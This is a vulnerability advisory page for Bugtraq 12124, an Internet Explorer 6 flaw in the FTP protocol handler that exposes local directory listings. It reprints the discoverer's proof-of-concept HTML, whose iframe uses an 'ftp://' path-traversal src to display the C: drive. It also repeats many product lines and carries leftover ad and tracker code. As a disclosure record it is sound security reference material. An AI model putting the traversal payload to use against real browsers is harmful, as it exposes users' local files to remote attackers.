Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

BID:12124

Info

Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

Bugtraq ID: 12124
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: Dec 29 2004 12:00AM
Updated: Dec 29 2004 12:00AM
Credit: Discovery is credited to Gregory Panakkal.
Vulnerable: Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Not Vulnerable:

Discussion

Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

Microsoft Internet Explorer contains a weakness that may allow remote attackers to disclose directory contents on the local system. This issue may be combined with other vulnerabilities to disclose sensitive information or reference previously placed malicious files on the system.

It is reported that this issue may be triggered by employing the 'SRC' attribute of an IFRAME combined with the 'ftp://' protocol handler. It should be noted that an attacker must be able to reference properties of the IFRAME remotely to carry out this attack. This may be accomplished by exploiting a zone bypass type of vulnerability.

Another attack scenario could involve an attacker placing a malicious file on a vulnerable system and then using this technique to determine the location of the file.

Exploit / POC

Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

An exploit is not required.

The following proof of concept is available:
<html>
<head>
<META NAME="COPYRIGHT" CONTENT="JunkCode">
<META NAME="CATEGORY" CONTENT="Freeware Utilities">
<META NAME="SITEINFO" CONTENT="http://crapware.lx.ro">
<META NAME="REVISIT-AFTER"CONTENT="5"days>
<META NAME="AUTHOR"CONTENT="JunkCode">
<META NAME="DESCRIPTION"CONTENT="Contains Freeware Utilities ( PEncrypt, ELFCrypt, Stealth Keyloggers, Trojans, Servers, Password Decryptors, Port Scanner etc... ), Useful Articles, Tutorials, Source Code etc..">
<META NAME="KEYWORDS"CONTENT="Utility, Program, Freeware, Shareware, Adware, Nagware, LCC Win32, Programming, C, C++, Java, Visual C++, Visual Basic, VBScript, JavaScript, CGI, Script, Free, Key Logger, Key Capture, Key Trap, Media, Player, MP3, WAV, AU, MP3Pro, MOV, AVI, MPEG, MPG, Explorer, Norton, Commander, Playlist Editor, Editor, Security, Software, Wrapper, Encryption, Self Extracble, Virus, Virii, Polymorphic, Stealth Keylogger, Stealth, Hidden, Fast, Compact, FP, Fronpage, Frontpage, Many, Microsoft, Sone, There, Those, UNIX, UPLOAD, WindowsNT, agains, also, directories, download, enabled, even, example, extensions, files, holes, horrible, let, list, lot, many, only, others, own, password, running, security, server, sites, vulnerabilities, while, work, Anonymity, privacy, TAZ, encryption,Internet, remailer, remailers, Mixmaster, nymserver, PGP, Proxys, WWW remailing, Mail2News, remailer tools, Paranoia, freedom.net, SSH, Onion Routing, Crowds, ACLU, Enemy of the State, MI5, MI6, Echelon, Anonymous surfing tools, NSA, idenity privacy, nym, EPIC, EFF, AAAS, SAIC, Anonymizer, DHP, CSE, attrition.org, freedom, Big Brother,Privacy International, ZKS, ZKS.net, anonymous, Cypherpunk, Type I, nowhere, Steganography, S-Tools, securenym, hushmail, mixfit, free,using cgi,how to use cgi-bin,how to use cgi,what is cgi,what is cgi,how do i use cgi,using perl scripts,how to use ssi,what is ssi,server side includes,server-side,SSI,severs,serves,common gateway interface,cgibin,cig,scrips,scritps,hosted,host,webmaster,help,unix,IIS,tutorial,instructions,guide,perl,on the fly,NT servers,bestdam,bestdamn,best damn,logger,traffic monitor,page counter,log hits,statistics,web logs,hit counts,hit counter,page statistics,track visitors,visitor count,page hits,hit information,auto e-mail,visitor information,scripts,perl,perl script,cgi-perl,cgi,web hosting,isp,what is cgi-bin,nt,host provider,analyze,analysis,tool,columns,columnar,traffic,webmaster,audit,unix,linux,best dam,NT Server,Windows NT,tutorial,guide,viewer,pearl,conts,conter,vistor,freeware download,server,shareware,keith parkansky,parkansky,keith,patch maker, ICQ, Pager, HTML, encrypt, crypt, CHTML, encode, decode, xor, decrypt, script, kiddie, crackme, cracker, procdump, unpacker, tools, w32intro, softice, anti, debugger, disassembler, w32dasm, pe, encryptor, packer, unpacker, PCGUARD, cryptor, war, northadamus, usa, britain, uk, president, bush, tony, blair, prime, minister, taliban, osama, bin, laden, osama bin laden, al, qaeda, terror, terrorists, WTC, world trade centre, attacks, PEncrypt v4.0, packers, trw2000, softice, trw, unpacker, crash">
<META NAME="ROBOTS"CONTENT="INDEX,FOLLOW">
</head>
<body>
<p align="center"><b><font face="Comic Sans MS"><u>Bypassing IE6-SP1
&quot;file://&quot; protection using &quot;ftp://&quot; !!</u></font></b></p>

<p align="center"><b>Discovered by : Gregory R. Panakkal / junkcode / viper31337</b></p>
<p align="left">Tested on : Windows 2000 SP4 - [NTFS], IE 6 SP1 up-to-date as
per windowsupdate.com</p>
<p align="left">Exploit : If you are able to see the contents of C:\ in the
iframe below, then you are vulnerable..&nbsp;</p>
<p align="left">[Info : Liu Die Yu tested on WinXP SP2 &amp; Win2003, but
the exploit failed.]</p>
<p align="left">&nbsp;</p>
<iframe src="ftp://:../../../../../../../../../../../"></iframe>
</body>
</html>
<title>
<!-- to remove the dumb lx.ro ads -->
<center>

<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=347052;
var sc_partition=1;
var sc_invisible=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c2.statcounter.com/counter.php?sc_project=347052&amp;java=0&amp;invisible=1" alt="free website hit counter" border="0"></a> </noscript>
<!-- End of StatCounter Code -->
<table border="0" style="border:1px solid #ccc;" cellpadding="1" cellspacing="2"><tr><td style="background-color: #eee;color:#333;font:normal normal 300 1em sans-serif">Sit gazduit de <a href="http://www.lx.ro"><font color="blue">LX.Ro</font></a>. Vrei sa ai si tu situl tau? Click <a href="http://www.lx.ro/contnou.php"><font color="blue">aici</font></a>!
</td></tr></table>
</center>

Solution / Fix

Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report